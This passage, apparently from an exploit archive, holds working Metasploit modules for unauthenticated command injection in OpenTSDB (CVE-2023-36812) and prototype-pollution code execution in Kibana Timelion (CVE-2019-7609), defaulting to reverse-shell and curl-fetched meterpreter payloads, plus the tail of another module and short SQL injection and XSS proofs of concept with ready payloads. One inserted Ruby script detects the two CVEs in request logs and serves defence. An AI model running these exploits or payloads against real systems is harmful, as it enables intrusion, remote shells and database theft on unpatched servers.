}<br /> })<br /><br /> # This doesn't work, because our payload blocks and it eventually fails<br /> fail_with(Failure::Unreachable, 'No response to 
command execution') if res.nil? || res.body.empty?<br /> fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')<br /><br /> print_good('Payload sent!')<br /> end<br /><br /> def exploit<br /> # Get the password hash (from SQL injection + auth bypass)<br /> username, hash = get_password_hash<br /><br /> # Use pass-the-hash to log in using that hash<br /> detected_platform = authenticate(username, hash)<br /><br /> # Sanity-check the target<br /> if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)<br /> fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")<br /> end<br /><br /> # Generate a payload based on the target type<br /> case target['Type']<br /> when :cmd<br /> my_payload = payload.encoded<br /> when :dropper<br /> my_payload = generate_payload_exe<br /> else<br /> fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")<br /> end<br /><br /> # Run a command, using the platform specified in the target<br /> if target.platform.platforms.include?(Msf::Module::Platform::Linux)<br /> execute_command_linux(my_payload)<br /> elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)<br /> execute_command_windows(my_payload)<br /> else<br /> fail_with(Failure::Unknown, "Unknown platform: #{platform}")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'OpenTSDB 2.4.1 unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection<br /> vulnerability in the key parameter in OpenTSDB through<br /> 2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve<br /> unauthenticated remote code execution as the root user.<br /><br /> The module first attempts to obtain the OpenTSDB version via<br /> the api. If the version is 2.4.1 or lower, the module<br /> performs additional checks to obtain the configured metrics<br /> and aggregators. It then randomly selects one metric and one<br /> aggregator and uses those to instruct the target server to<br /> plot a graph. 
As part of this request, the key parameter is<br /> set to the payload, which will then be executed by the target<br /> if the latter is vulnerable.<br /><br /> This module has been successfully tested against OpenTSDB<br /> version 2.4.1.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Gal Goldstein', # discovery<br /> 'Daniel Abeles', # discovery<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['URL', 'https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw'], # security advisory<br /> ['CVE', '2023-36812'], # CVE linked in the official security advisory<br /> ['CVE', '2023-25826'] # CVE that seems to be a dupe of CVE-2023-36812 since it describes the same issue and references the PR that introduces the commits that are referenced in CVE-2023-36812<br /> ],<br /> 'Platform' => 'linux',<br /> 'Arch' => 'ARCH_CMD',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',<br /> 'RPORT' => 4242,<br /> 'SRVPORT' => 8080,<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),<br /> 'FETCH_WRITABLE_DIR' => '/tmp',<br /> 'FETCH_SRVPORT' => 8081<br /> },<br /> 'Targets' => [ [ 'Linux', {} ] ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-07-01',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),<br /> ]<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely OpenTSDB<br /> res1 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> unless res1<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res1.code == 200 && 
res1.get_html_document.xpath('//title').text.include?('OpenTSDB')<br /> return CheckCode::Safe('Target is not an OpenTSDB application.')<br /> end<br /><br /> # get the version via the api<br /> res2 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'version')<br /> })<br /><br /> unless res2<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res2.code == 200 && res2.body.include?('version')<br /> return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')<br /> end<br /><br /> begin<br /> parsed_res_body = JSON.parse(res2.body)<br /> rescue JSON::ParserError<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> version = parsed_res_body['version']<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('2.4.1')<br /> return CheckCode::Appears("The target is OpenTSDB version #{version}")<br /> else<br /> return CheckCode::Safe("The target is OpenTSDB version #{version}")<br /> end<br /> rescue ArgumentError => e<br /> return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")<br /> end<br /> end<br /><br /> def select_metric<br /> # check if any metrics have been configured. 
if not, exploitation cannot work<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'suggest'),<br /> 'vars_get' => { 'type' => 'metrics' }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")<br /> end<br /><br /> begin<br /> metrics = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')<br /> end<br /><br /> unless metrics.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')<br /> end<br /><br /> if metrics.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')<br /> end<br /><br /> # select a random metric since any will do<br /> @metric = metrics.sample<br /> print_status("Identified #{metrics.length} configured metrics. 
Using metric #{@metric}")<br /> end<br /><br /> def select_aggregator<br /> # check the configured aggregators and select one at random<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'aggregators')<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")<br /> end<br /><br /> begin<br /> aggregators = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')<br /> end<br /><br /> unless aggregators.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')<br /> end<br /><br /> if aggregators.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')<br /> end<br /><br /> # select a random aggregator since any will do<br /> @aggregator = aggregators.sample<br /> print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # we need to percent encode the entire command.<br /> # however, the + character cannot be used and percent encoding does not help for it. 
so we need to change chmod +x with chmod 744<br /> cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))<br /> start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data<br /> start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')<br /> end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data<br /> end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')<br /> get_vars = {<br /> 'start' => start_value,<br /> 'end' => end_value,<br /> 'm' => "#{@aggregator}:#{@metric}",<br /> 'o' => 'axis+x1y2',<br /> 'ylabel' => Rex::Text.rand_text_alphanumeric(8..12),<br /> 'y2label' => Rex::Text.rand_text_alphanumeric(8..12),<br /> 'yrange' => '[0:]',<br /> 'y2range' => '[0:]',<br /> 'key' => "%3Bsystem%20%22#{cmd}%22%20%22",<br /> 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",<br /> 'style' => 'linespoint'<br /> }<br /><br /> exploit_uri = '?'<br /> get_vars.each do |key, value|<br /> exploit_uri += "#{key}=#{value}&"<br /> end<br /> exploit_uri += 'json'<br /><br /> # using a raw request because cgi was leading to encoding issues<br /> send_request_raw({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)<br /> }, 0) # we don't have to wait for a reply here<br /> end<br /><br /> def exploit<br /> select_metric<br /> select_aggregator<br /> print_status('Executing the payload')<br /> execute_command(payload.encoded)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ManualRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Kibana Timelion Prototype Pollution RCE',<br /> 'Description' => %q{<br /> Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.<br /> An attacker with access to the Timelion application could send a request that will attempt to execute<br /> javascript code. This leads to an arbitrary command execution with permissions of the<br /> Kibana process on the host system.<br /><br /> Exploitation will require a service or system reboot to restore normal operation.<br /><br /> The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells<br /> (50-100+), while setting it too low will cause no shells to be obtained. 
WFSDELAY of 10 for a<br /> docker image caused 6 shells.<br /><br /> Tested against kibana 6.5.4.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Michał Bentkowski', # original PoC, analysis<br /> 'Gaetan Ferry' # more analysis<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/mpgn/CVE-2019-7609'],<br /> [ 'URL', 'https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/'],<br /> [ 'CVE', '2019-7609']<br /> ],<br /> 'Platform' => ['unix'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2019-10-30',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash',<br /> 'WfsDelay' => 10 # can take a minute to run<br /> },<br /> 'Notes' => {<br /> # the webserver doesn't die, but certain requests no longer respond before a timeout<br /> # when things go poorly<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(5601),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> # this pulls a big JSON blob that we need as it has the version<br /> unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body<br /> return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")<br /> end<br /><br /> 
version_json = CGI.unescapeHTML(Regexp.last_match(1))<br /><br /> begin<br /> json_body = JSON.parse(version_json)<br /> rescue JSON::ParserError<br /> return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")<br /> end<br /><br /> return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?<br /><br /> @version = json_body['version']<br /><br /> if Rex::Version.new(@version) < Rex::Version.new('5.6.15') ||<br /> (<br /> Rex::Version.new(@version) < Rex::Version.new('6.6.1') &&<br /> Rex::Version.new(@version) >= Rex::Version.new('6.0.0')<br /> )<br /> return CheckCode::Appears("Exploitable Version Detected: #{@version}")<br /> end<br /><br /> CheckCode::Safe("Unexploitable Version Detected: #{@version}")<br /> end<br /><br /> def get_xsrf<br /> vprint_status('Grabbing XSRF Token')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'bundles', 'canvas.bundle.js'),<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200<br /><br /> return Regexp.last_match(1) if /"kbn-xsrf":"([^"]+)"/ =~ res.body<br /><br /> nil<br /> end<br /><br /> def trigger_socket<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'socket.io/'), # trailing / is required<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'kbn-xsrf' => @xsrf<br /> },<br /> 'vars_get' => {<br /> 'EIO' => 3,<br /> 'transport' => 'polling'<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200<br /> end<br /><br /> def send_injection(reset: false)<br /> if 
reset<br /> pload = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"<br /> else<br /> # we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS<br /> pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')|<br /> end<br /> body = {<br /> 'sheet' => [pload],<br /> 'time' => {<br /> 'from' => 'now-15m',<br /> 'to' => 'now',<br /> 'mode' => 'quick',<br /> 'interval' => 'auto',<br /> 'timezone' => 'America/New_York'<br /> }<br /> }<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'timelion', 'run'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'headers' => { 'kbn-version' => @version },<br /> 'data' => body.to_json.sub('PAYLOADHERE', payload.encoded.gsub("'", "\\\\\\\\\\\\\\\\'")),<br /> 'keep_cookies' => true<br /> )<br /> Rex.sleep(2) # let this take hold, if we go too fast we don't get the shell<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200<br /> end<br /><br /> def exploit<br /> check if @version.nil?<br /> print_status('Polluting Prototype in Timelion')<br /> send_injection<br /><br /> @xsrf = get_xsrf<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to grab XSRF token") if @xsrf.nil?<br /><br /> print_status('Triggering payload execution via canvas socket')<br /> trigger_socket<br /> print_status('Waiting for shells')<br /> Rex.sleep(datastore['WFSDELAY'] / 10)<br /> unless @reset_done<br /> print_status('Unsetting to stop raining shells from a lacerated kibana')<br /> send_injection(reset: true)<br /> trigger_socket<br /> end<br /> end<br /><br /> def on_new_session(_client)<br /> return if 
@reset_done<br /><br /> print_status('Unsetting to stop raining shells from a lacerated kibana')<br /> send_injection(reset: true)<br /> trigger_socket<br /> @reset_done = true<br /> ensure<br /> super<br /> end<br /><br />end<br /></code></pre>
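A defender-side check covering both modules above, the OpenTSDB `key` parameter injection (CVE-2023-36812) and the Kibana Timelion prototype pollution (CVE-2019-7609): this is added example code, not part of either Metasploit module. It runs over constructed request records in a simplified `<method> <path> <body>` form; the record format and the PLACEHOLDER values are assumptions, and the signatures are taken from the request shapes the two modules send.

```ruby
require 'cgi'
require 'json'

# Constructed sample request records in a simplified "<method> <path> <body>" form
# (body is "-" when empty). These are made up for this example, not real captures.
SAMPLE_LOG = [
  'GET /q?start=2010/01/01-00:00:00&m=sum:sys.cpu.user&key=%3Bsystem%20%22PLACEHOLDER_CMD%22%20%22&json -',
  'GET /q?start=2010/01/01-00:00:00&m=sum:sys.cpu.user&key=top%20left&json -',
  "POST /api/timelion/run {\"sheet\":[\".es(*).props(label.__proto__.env.NODE_OPTIONS='--require PLACEHOLDER')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\"}}",
  "POST /api/timelion/run {\"sheet\":[\".es(*).label('cpu')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\"}}",
  'GET /api/version -'
].freeze

# gnuplot's key option legitimately takes placement words such as "top left";
# a semicolon or the gnuplot "system" command inside it is the CVE-2023-36812 signature
# (OpenTSDB <= 2.4.1 passes the value through unvalidated).
OPENTSDB_KEY_PATTERN = /;|\bsystem\b/

# Timelion expressions never need to touch the prototype chain or the Node.js
# environment; Kibana < 5.6.15 / 6.0.0-6.6.0 let them do exactly that.
PROTO_POLLUTION_PATTERN = /__proto__|constructor\s*\.\s*prototype|NODE_OPTIONS/

# Returns [[record_index, reason], ...] for records matching either exploitation pattern.
def find_exploit_attempts(records)
  hits = []
  records.each_with_index do |record, idx|
    method, target, body = record.split(' ', 3)
    path, query = target.split('?', 2)

    if method == 'GET' && path == '/q' && query
      # CGI.parse percent-decodes values, so %3Bsystem becomes ";system" before matching.
      key = CGI.parse(query)['key'].first.to_s
      hits << [idx, "opentsdb_gnuplot_injection key=#{key.inspect}"] if key.match?(OPENTSDB_KEY_PATTERN)
    elsif method == 'POST' && path == '/api/timelion/run' && body && body != '-'
      sheet = begin
        parsed = JSON.parse(body)
        parsed.is_a?(Hash) ? parsed.fetch('sheet', []) : [body]
      rescue JSON::ParserError
        [body] # malformed JSON: fall back to scanning the raw body
      end
      expr = sheet.find { |e| e.is_a?(String) && e.match?(PROTO_POLLUTION_PATTERN) }
      hits << [idx, "kibana_timelion_prototype_pollution expr=#{expr.inspect}"] if expr
    end
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  find_exploit_attempts(SAMPLE_LOG).each { |idx, reason| puts "record #{idx}: #{reason}" }
end
```

The Timelion check needs the request body, so it only works on a log source that records bodies (a reverse proxy or WAF in front of Kibana); plain access logs suffice for the OpenTSDB query-string check.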
<pre><code>======================================================================================================================================<br />| # Title : JPC2 CMS v1.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |<br />| # Vendor : https://www.facebook.com/JPC2GroupWeb | <br />| # Dork : "Web design and development JPC2 Group Web" |<br />======================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13<br /><br />[+] Panel : http://127.0.0.1/wwwnpmlexcom/en/administrador/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Izdelava IDS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://studiointera.net | <br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Meeting Room Booking System-1.0 Multiple - SQLi<br />## Author: nu11secur1ty<br />## Date: 09/06/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The column parameter appears to be vulnerable to SQL injection<br />attacks. The payload ' was submitted in the column parameter, and a<br />database error message was returned. An attacker can easily steal all<br />information from the database of this web application!<br />WARNING! All of you: Be careful what you buy! This will be your responsibility!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: column (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)<br /> Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT<br />6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT<br />(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace<br /> Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE<br />WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)<br /><br />## Time spent:<br />01:47:00<br /><br /><br /></code></pre>